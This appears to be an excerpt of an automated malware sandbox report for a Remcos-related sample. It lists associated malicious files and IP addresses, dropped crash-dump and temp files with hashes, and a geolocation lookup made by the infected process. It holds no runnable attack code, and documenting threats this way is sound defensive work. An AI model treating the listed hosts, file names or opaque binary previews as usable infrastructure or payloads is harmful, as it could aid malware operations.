              Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              bYPQHxUNMF.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              doc.batGet hashmaliciousGuLoader, RemcosBrowse
              • 178.237.33.50
              New Order.xla.xlsxGet hashmaliciousRemcosBrowse
              • 178.237.33.50

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              AS-COLOCROSSINGUSNotice.xlsGet hashmaliciousUnknownBrowse
              • 192.3.239.4
              irlsheis.docGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 192.3.239.4
              Order Request1_5_24.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
              • 23.94.54.101
              202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
              • 23.94.53.100
              OWrVfOdM62.rtfGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 192.3.239.4
              ET2431000075 & ET2431000076.xlsGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 192.3.239.4
              nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
              • 107.172.31.6
              SecuriteInfo.com.Linux.Siggen.9999.4824.4127.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 23.94.151.97
              QF3YL9rOxB.rtfGet hashmaliciousAgentTeslaBrowse
              • 192.3.243.154
              attachment.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
              • 23.94.54.101
              ATOM86-ASATOM86NLINQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
              • 178.237.33.50
              202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
              • 178.237.33.50
              https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c2e8c3b1-63be-4a97-a3b9-a21649a6fcffGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              bYPQHxUNMF.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              doc.batGet hashmaliciousGuLoader, RemcosBrowse
              • 178.237.33.50

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_5693d0d813f2531fe5aa358b2e8db4971ac2bbc_ce844639_4f98f805-979e-40ac-b848-95ff23acc2eb\Report.wer

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.9908841311634949
              Encrypted:false
              SSDEEP:192:hKFEz1JwS0YrZkCrjvZrbBvwzuiFKZ24IO8KR:IFSJwZYrZkCrjQzuiFKY4IO8KR
              MD5:27F8D24BEFC0A69510CB9558A1BA72C0
              SHA1:6492B48ED9B4BE46590A65786C41A712CDDDC037
              SHA-256:AE2763A822C744C7C2248FB2CD65FA646A243CDCEA551E85D95FB72A5434F4AE
              SHA-512:F06A7252261C1ACB6448EE098D4F2569159178ECB21BF1AA12B953AFBD448A177AEDEC15D214D9B2320FE8624B15F9AC9B066C35DC5D737C3DB750818CF5BB02
              Malicious:false
              Reputation:low
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.1.2.8.9.9.7.7.5.3.0.5.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.1.2.8.9.9.8.2.9.9.9.2.9.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.9.8.f.8.0.5.-.9.7.9.e.-.4.0.a.c.-.b.8.4.8.-.9.5.f.f.2.3.a.c.c.2.e.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.c.3.7.a.6.7.d.-.e.b.5.c.-.4.3.8.f.-.a.7.4.8.-.a.a.7.3.9.8.6.4.2.a.c.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.c.8.-.0.0.0.1.-.0.0.1.5.-.0.8.8.4.-.b.5.0.6.9.2.9.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.3.1.9.6.f.4.5.b.2.6.9.a.6.1.4.a.3.9.2.6.e.f.c.0.3.2.f.c.9.d.7.5.0.1.7.f.2.7.e.

              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_af2772e4ab08333cacfef31df4e86d06a6d18a1_ce844639_5511f13d-c1c7-48e1-aaed-66db8b4a8302\Report.wer

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.9911070271944696
              Encrypted:false
              SSDEEP:192:7q+Kx+Ez1Jpu0qG2GMAjvZrbBvwzuiFKZ24IO8KR:u+KESJpVqGPMAjQzuiFKY4IO8KR
              MD5:46C65D7B8DC1308E63186F7288000E17
              SHA1:54252ED55CA84466F348366E0000F664601BC00A
              SHA-256:DBC5DF40AD6E09535807B425DA6A334CD5B00BF6363A230BFB77CA3A710D86E1
              SHA-512:61F7F0F0CD97CBFB7ECCF748FF6ADBBAF4591B3CA3891CCF5FD97AAF036369A9EB1406C6F60CA54FEC7C862E248117BD074379E6566A59363518A29AAAD6C399
              Malicious:false
              Reputation:low
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.1.2.9.0.0.6.0.3.2.8.0.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.1.2.9.0.0.6.8.2.9.6.8.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.5.1.1.f.1.3.d.-.c.1.c.7.-.4.8.e.1.-.a.a.e.d.-.6.6.d.b.8.b.4.a.8.3.0.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.6.6.a.e.9.4.7.-.c.7.1.6.-.4.4.7.3.-.9.3.1.6.-.4.d.b.4.4.a.0.3.b.d.6.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.c.8.-.0.0.0.1.-.0.0.1.5.-.0.8.8.4.-.b.5.0.6.9.2.9.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.3.1.9.6.f.4.5.b.2.6.9.a.6.1.4.a.3.9.2.6.e.f.c.0.3.2.f.c.9.d.7.5.0.1.7.f.2.7.e.

              C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA26.tmp.dmp

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Thu May 2 13:09:58 2024, 0x1205a4 type
              Category:dropped
              Size (bytes):139466
              Entropy (8bit):1.7339115721187133
              Encrypted:false
              SSDEEP:384:EGG0W0VmBu5NvsJ+zWOsIRM9QB4qwYs8PHgaDf9Tja/nOoMyFT:EP0fVmBu5NvsJ+zdPR8QByx8vjCEyF
              MD5:F0DF7F2C48AECE9C97D5341E8D855A50
              SHA1:C8EC333B7200BD290E4DF7E6E92819C9B1341A1D
              SHA-256:42CF64131E6C85E6F1AC80FAE6FC13100E49DF170E0493D6231604FAE4234824
              SHA-512:8CE00B81B834AB7EEBAD724A23D090B9EFA5823F229BBADF6A2A5E651C39CE75CDD2BF210AF99F92C1013B940DAD6219F7F1B1A9D226DEFE4DBFB5578451C975
              Malicious:false
              Reputation:low
              Preview:MDMP..a..... .........3f....................................D...$T..........T.......8...........T............7..............P!..........<#..............................................................................eJ.......#......GenuineIntel............T.............3f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB8E.tmp.WERInternalMetadata.xml

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):6312
              Entropy (8bit):3.715439962806717
              Encrypted:false
              SSDEEP:192:R6l7wVeJ746cEYpnEuZbeprp89b3AsfFgdm:R6lXJk6PYpnEuZJ3TfFn
              MD5:0B05CB517001DF797EBAC2B1C37ED4AB
              SHA1:749C3B3AE13DC93FFCA4761A3D7DF215DE81F1D7
              SHA-256:488FA5FAB5A639716D898B61C03BBBB1D89D3668EB56895819032A50621F0632
              SHA-512:4781D87A1F58670E3103AB736105371F650B4DE6BEC3A6253E178FE9D35C766B40EA8F6D0505720A2457AC6626234F7B4802892F6323D4F9931D1E7824D69254
              Malicious:false
              Reputation:low
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.4.8.<./.P.i.

              C:\ProgramData\Microsoft\Windows\WER\Temp\WERCBAF.tmp.xml

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4655
              Entropy (8bit):4.450591405528264
              Encrypted:false
              SSDEEP:48:cvIwWl8zsWJg77aI9wjLWpW8VYoybYm8M4JCFLFJq+q8+ED0Bd:uIjfsI7Wj67VFpJCdqID0Bd
              MD5:ADF3EB64E57919812DA05CF699F11706
              SHA1:ADFAEE81EAE9E70204357DE82F56E314C49D5993
              SHA-256:AA4ADF4CCFBF27C054815D19B095B4C00B834A32AA664CF9C69EE15D70E2B229
              SHA-512:781258F64C767AFA64C8788D1699B6AC4DC915CEB1E699063A8484E68AAF95D52B91690F8E2721E0C9DC437B6AFA57E5B55804DAD2F414A38CEA197F5D898C88
              Malicious:false
              Reputation:low
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="305532" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

              C:\ProgramData\Microsoft\Windows\WER\Temp\WEREBD7.tmp.dmp

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Thu May 2 13:10:06 2024, 0x1205a4 type
              Category:dropped
              Size (bytes):135784
              Entropy (8bit):1.7512160344777987
              Encrypted:false
              SSDEEP:384:xfWG0W0VmdZu518kZYg+yWOdADjOqwYs8PHuaAAWGBqm7i3p:pf0fVm7u5KgYg+ydyDjAx83HBo
              MD5:56704161B993132615A4C5C34D47F95F
              SHA1:3894A3D1CD858F7ECE50EB28BDAEFD9F68E28588
              SHA-256:A769FA47E2ED7D8C8A7E67728CBC15B1F6FB64AB612B176CA6A5DE781F230827
              SHA-512:EC0FD2AEFFC3BFD85E99A5553F4D11032484CF3508ED9F71D362DCF8AB4D6D3572B46241FC6E39CE0807D1DD16A7F46144469B3F301ADA5A6794E8B48F0CD1DB
              Malicious:false
              Reputation:low
              Preview:MDMP..a..... .........3f....................................t...$T..........T.......8...........T............7..............P!..........<#..............................................................................eJ.......#......GenuineIntel............T.............3f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\ProgramData\Microsoft\Windows\WER\Temp\WERECB3.tmp.WERInternalMetadata.xml

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):6312
              Entropy (8bit):3.7145042097004186
              Encrypted:false
              SSDEEP:192:R6l7wVeJ746rYpnAAMepDB89bsAsfT+XEm:R6lXJk6rYpnAbsTfT+h
              MD5:765313AF787D64F3C9502D34D8761089
              SHA1:5289E2E12CBAFD101695564A49C8BAF71E81CEB8
              SHA-256:88BDB98FC41B3357076284E4FE53B498B3B8DF0907B27CD1011C2B7111E4B6A1
              SHA-512:3E4C2DDBA4686287C2ECA2C0C31032DBE384CE793F2519FB48938932DB8CD5A3CC0AD7C6C28AAE236766ABAE2ED47CB9810C72CAFDB54A18C8CB0CC42555600F
              Malicious:false
              Reputation:low
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.4.8.<./.P.i.

              C:\ProgramData\Microsoft\Windows\WER\Temp\WERECD3.tmp.xml

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4655
              Entropy (8bit):4.4515084324754
              Encrypted:false
              SSDEEP:48:cvIwWl8zsWJg77aI9wjLWpW8VYoePYm8M4JCFpFD+q88ED0Bd:uIjfsI7Wj67VFeSJC5eD0Bd
              MD5:FD84273EEFC9C46279BEB3594BFB2A3C
              SHA1:F7C6B2E652AE0DE9252A6C8ED133D4AD36294A7D
              SHA-256:EBE856B44E537D1D44781073E44132E9C31813EFB452F75579BD644DFE0B83E2
              SHA-512:31E8C6675455A7F278985EF61E885BF52B640AB69276FAF4395785638ADE8928B4E77EBBEE570FBB25318EFA5CA36321A4132CAF4AEDF2ADE24C0804D819A2E0
              Malicious:false
              Reputation:low
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="305532" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json

              Download File
              Process:C:\Windows\SysWOW64\svchost.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):965
              Entropy (8bit):5.025809437493847
              Encrypted:false
              SSDEEP:12:tkhXkmnd61GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qhXldluKyGX85jvXhNlT3/7AcV9Wro
              MD5:85152B3860306466F9B8AABA05FE62FA
              SHA1:CB2407B7EE570697BD97C1D9FA07EA7E10412D1B
              SHA-256:DD5D42EF9E0485E502C4E66A32ADBD4A4EF49528109BDE8E4DC1113C2DA6F86A
              SHA-512:F87F7420DA5055C72CF21153447C270A130855C84EE094A974E80A7F1EFDD9D960FFE27692A26954F2A746BACC821561625F1EE2C396DFBFFB2F6C1EE859D2DC
              Malicious:false
              Preview:{. "geoplugin_request":"191.96.150.225",. "geoplugin_status":200,. "geoplugin_delay":"3ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

              C:\Users\user\AppData\Local\Temp\aut867.tmp

              Download File
              Process:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
              File Type:data
              Category:dropped
              Size (bytes):415558
              Entropy (8bit):7.980802161270596
              Encrypted:false
              SSDEEP:6144:B5V2kSfdEVJBkA8liRllAjk0/5F2m0SDEHPTmXWbdChTm+1hEDubJUoztcl8cC2h:rYkS1KWA8SbZ0F24gRsp1mD27tcy+
              MD5:6167A7957E72F9B3A53C5667A7C56057
              SHA1:00AC978BFF6FA30F4429ECD8810460642C5767B0
              SHA-256:26939E2779D04E0E5CC020694B7EAF38525FD40E13E06DB165C08449A13FA347
              SHA-512:0D705C994C7405358EB5531A5A19CC8A1EC1CCF2E25D76CAA2C7A368DA474FC1E65B688E79F1D978B079057B99B9D43D3954AAFD32553276CE0595B12C366CF8
              Malicious:false
              Preview:EA06.........b.5.R..nO:.J.V+Up..i..M...U*h...P...Z..+U.?.w4.O.q|M........V.8..h..=..9.Nf.Z_..P....j...B......(.....:8......_4X.LCm.m.Q*E.a..i'..6...r*..|sa.F......x-.9.....l...U.a.t.......<...;.H.r!..N..&.s..J.7.O....{...2.d,...3.4..1.X..3K.H........G.....gJ...U@..uf....o?.R....^.N.-.7.M*iH..;.....6...J.^.I..@..}*j.....i6....X.mf..$.m!..iUz.p.......;...:...q.........i_..j..... ._.=..V(@..7.L..@....SP...5B..g...M].Md....iJ.L..~..b.7.O.5Y.Vm6...)NUJ.L..x....?...B....l..\"..-6.4...........1Q..j.......%6i6.........t.V..i]N......@.i.V)....b....r...y.......(.<R&@...*5D..d...c-l.-:...(.x.W..>8..............EH..2*..;Z../si.O._!......I.p..z.......>+...<`X%f.5..6V{}>km.......4..x`...7.N&4..JO...+.).*...L~...~.....I.&.s..P*.j....oP.z...W#.X.cI.Rf..."....6Q*E2k\...sn...7.@.*f2.....K.*i0..#.....7.[._=U..h.x&.I.D.i..-Ri.7ez..5...2.I.3^.2.5.Z1?:d^;W.igSJUr.I.R.TKuf....4.P...E.Z; .M..j.R....B...@iSJ.J...w#V.b+..R...5....kUy...q.w#...*'.....gwsE.M...>i..X

              C:\Users\user\AppData\Local\Temp\aut8C6.tmp

              Download File
              Process:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
              File Type:data
              Category:dropped
              Size (bytes):9916
              Entropy (8bit):7.600038819371061
              Encrypted:false
              SSDEEP:192:m+cKumbG02JtWU+F6xcj8DiqAEgADXuLKZRvVE8ZGD/Lr6mjNAEOLiX:97umbGRJtWjAuYipVkX2KZ/E8ZGD/XVf
              MD5:85EC07A5B813744D5460158A4F4C3B75
              SHA1:9A40D20BD37344BB771FA10D81E813397AEA3B90
              SHA-256:64B6B2C25F3830B385DC1E421742721FA60298892200EDF21BCC1DE44C9DDEFC
              SHA-512:0D591CF85239BC1E138DBE0A877F26FABB2EE5924BEA0195488FF7816DFDCEB2D6EF5A864A424004C82671EC57F41C455A774822A7A3D75341B44B5AD7A3099C
              Malicious:false
              Preview:EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

              C:\Users\user\AppData\Local\Temp\autBD74.tmp

              Download File
              Process:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
              File Type:data
              Category:dropped
              Size (bytes):415558
              Entropy (8bit):7.980802161270596
              Encrypted:false
              SSDEEP:6144:B5V2kSfdEVJBkA8liRllAjk0/5F2m0SDEHPTmXWbdChTm+1hEDubJUoztcl8cC2h:rYkS1KWA8SbZ0F24gRsp1mD27tcy+
              MD5:6167A7957E72F9B3A53C5667A7C56057
              SHA1:00AC978BFF6FA30F4429ECD8810460642C5767B0
              SHA-256:26939E2779D04E0E5CC020694B7EAF38525FD40E13E06DB165C08449A13FA347
              SHA-512:0D705C994C7405358EB5531A5A19CC8A1EC1CCF2E25D76CAA2C7A368DA474FC1E65B688E79F1D978B079057B99B9D43D3954AAFD32553276CE0595B12C366CF8
              Malicious:false
              Preview:EA06.........b.5.R..nO:.J.V+Up..i..M...U*h...P...Z..+U.?.w4.O.q|M........V.8..h..=..9.Nf.Z_..P....j...B......(.....:8......_4X.LCm.m.Q*E.a..i'..6...r*..|sa.F......x-.9.....l...U.a.t.......<...;.H.r!..N..&.s..J.7.O....{...2.d,...3.4..1.X..3K.H........G.....gJ...U@..uf....o?.R....^.N.-.7.M*iH..;.....6...J.^.I..@..}*j.....i6....X.mf..$.m!..iUz.p.......;...:...q.........i_..j..... ._.=..V(@..7.L..@....SP...5B..g...M].Md....iJ.L..~..b.7.O.5Y.Vm6...)NUJ.L..x....?...B....l..\"..-6.4...........1Q..j.......%6i6.........t.V..i]N......@.i.V)....b....r...y.......(.<R&@...*5D..d...c-l.-:...(.x.W..>8..............EH..2*..;Z../si.O._!......I.p..z.......>+...<`X%f.5..6V{}>km.......4..x`...7.N&4..JO...+.).*...L~...~.....I.&.s..P*.j....oP.z...W#.X.cI.Rf..."....6Q*E2k\...sn...7.@.*f2.....K.*i0..#.....7.[._=U..h.x&.I.D.i..-Ri.7ez..5...2.I.3^.2.5.Z1?:d^;W.igSJUr.I.R.TKuf....4.P...E.Z; .M..j.R....B...@iSJ.J...w#V.b+..R...5....kUy...q.w#...*'.....gwsE.M...>i..X

              C:\Users\user\AppData\Local\Temp\autBDD3.tmp

              Download File
              Process:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
              File Type:data
              Category:dropped
              Size (bytes):9916
              Entropy (8bit):7.600038819371061
              Encrypted:false
              SSDEEP:192:m+cKumbG02JtWU+F6xcj8DiqAEgADXuLKZRvVE8ZGD/Lr6mjNAEOLiX:97umbGRJtWjAuYipVkX2KZ/E8ZGD/XVf
              MD5:85EC07A5B813744D5460158A4F4C3B75
              SHA1:9A40D20BD37344BB771FA10D81E813397AEA3B90
              SHA-256:64B6B2C25F3830B385DC1E421742721FA60298892200EDF21BCC1DE44C9DDEFC
              SHA-512:0D591CF85239BC1E138DBE0A877F26FABB2EE5924BEA0195488FF7816DFDCEB2D6EF5A864A424004C82671EC57F41C455A774822A7A3D75341B44B5AD7A3099C
              Malicious:false
